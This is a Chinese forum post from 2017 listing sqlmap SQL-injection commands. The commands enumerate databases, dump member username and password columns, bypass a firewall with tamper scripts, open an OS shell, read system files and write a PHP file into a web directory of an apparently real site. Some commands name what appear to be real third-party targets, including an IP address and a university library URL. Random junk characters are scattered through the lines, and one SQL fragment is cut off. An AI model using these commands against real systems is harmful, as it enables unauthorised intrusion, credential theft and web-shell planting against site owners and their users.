找回密码
 立即注册
查看: 2895|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
0 k$ p' C& X0 [) [6 g" K  }1 g! h  B' S. d: j: a7 g0 n; D
update :::::>     in the folder   after  execute    following   order : svn update+ G, j  \2 G/ B  ]" x8 g; I
( ~6 b6 d2 ^& O$ D
sqlmap.py -r 1.txt --current-db0 O- I0 e# I: h" }5 e
% `2 t: s: g) D, E+ A8 J8 z
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”7 k, J; m! k8 f

: L) ^" A  v6 S2 z! q==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) ' J& Y3 K  {6 R* G; R: k
猜解数据库% ^9 d; ]6 a9 g  S! l( {5 X
./sqlmap.py -u "injection-url" --dbs
  {& \& d3 g4 N6 msqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"# i$ U1 P2 h' e1 t' K
2 V! N) e: s0 e: G; }+ N  ~
猜解表名* O9 Y- R/ j/ R
./sqlmap.py -u "injection-url" -D database_name --tables
2 i8 U( F, k, H# y' G7 v" e
6 |' W+ Y/ O1 b- fsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"1 W/ n) {' l* f
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
  Q+ `; L# I3 ~' j3 Q2 d% E2 P; Z
: p) f' U, M  ~7 Ssqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump% y/ {. R/ M6 Z

  C/ L3 T) g* V7 zsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
1 z6 e& K: ]9 M' D7 \( F+ wsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
- T6 c6 m( O) nsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
/ H% Z- d2 ?5 O8 ssqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"' L; c$ Q9 p) W7 j+ [+ I# C
7 C# Z# Z! X6 X0 O
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"; h- w. ?$ J# m1 H! K
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
! v5 _! F, b) h0 P  e+ esqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
# a- F# X5 a& ^0 s! }sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"7 l, F7 H  `" z. V) y
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
. C& _) j9 Q; z' `% |) B
3 c% ~7 r* J* n+ `: Osqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了, ?" i  c4 }. h9 i
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
& n% q, g& K/ |" E" O: c2 ^" z. z9 S: ?2 ?* |8 c
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"# k- Z/ U9 v% u5 v7 s
猜解列名
7 C9 B$ ?$ B/ Q! R* [./sqlmap.py -u "injection-url" -D database_name -T table_name --columns1 i  _" @7 X" P7 N6 |8 a6 n" y& G( l, k
% t2 A3 i1 U3 Y) ?
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" 9 b, C7 U0 s! l  S' R, X/ I
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" ) e5 y4 J3 s$ O
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
: j9 {0 O5 e0 L5 b# M( [
4 o$ j1 {: ~+ q4 nsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py". i0 @* {* Q. O1 l3 P
&submit=Go$ P' [3 s# y; u
猜解值* J8 L- m- M  v; a; ~" D
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump/ ]$ C7 U7 X$ d7 u( `6 O: @4 S
========================================================4 {7 \$ ]% f& F6 Y4 _$ a- }( U- Z' r
搜索表名中包括mana字符的; i1 W6 X2 Z) L/ G4 X
/sqlmap.py -u "injection-url" -T mana --search# S9 M5 l/ M: Y8 P" v  k/ N% {
返回一个交互式sql shell
: P0 D7 q2 a1 a+ N/sqlmap.py -u "injection-url" --sql-shell9 g" l1 ^2 t3 N: P7 L0 ^
读取指定文件(需权限)
: p$ k3 R% v8 m- G: g3 ^0 l/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"0 ]. k5 Z$ [$ \
查看当前 用户 及 数据库 6 M1 J; [6 t- p/ r
/sqlmap.py -u "injection-url" --current-user --current-db
" j% j, n2 a0 y+ V2 @+ j9 C! L, i本地文件 写入 远程目标绝对路径9 ]" H# R  f& v- ]9 H
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
% d. k( Q/ P: y1 Usqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
6 p$ N1 A0 f% p6 I+ M* @' |( C) Y
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
2 @; c  b  U6 \) o7 a( p查看某用的权限
8 u2 g: e& d- ~7 i/sqlmap.py -u "injection-url" --privileges -U root
  b/ G4 F- c- S查看当前用户是否为dba" s( O9 S) C# q1 T% B
/sqlmap.py -u "injection-url" --is-dba( |- M0 \  P6 H! \  W& ^$ {
读取所有数据库用户或指定数据库用户的密码7 Q& I7 E  R% C1 M; h, m
sqlmap.py -r 1.txt --users --passwords4 c, H8 [' @0 w2 P( d
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" ' |; v7 Q8 V6 U; K4 T2 o" s
" n6 Q- R7 e3 _' g" K  _
/sqlmap.py -u "injection-url" --passwords -U root
8 j3 p& B' t: j6 e
% M" v, S8 S9 a5 Q0 L) m3 W--start&&--stop 与 --first&&--last 的区别
* K7 P; r7 i! w+ g/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)# D7 n  C1 ~+ }$ w3 j8 u

( @& R* ^' V4 U( \! z+ F6 d$ t从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
4 r: L" U( y/ {8 Z, G6 R/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
, @, }/ x$ K1 Y. L7 T' q" x5 t/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
1 r4 ]( V0 F; R) M: e  A! |, s) i" }% K# ^
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)& _- [0 ?' c; E6 Y+ ]: P/ {
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
  a# l  G' n+ O  C1 ]4 X4 P: v4 O0 L2 `2 [' A9 u) s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表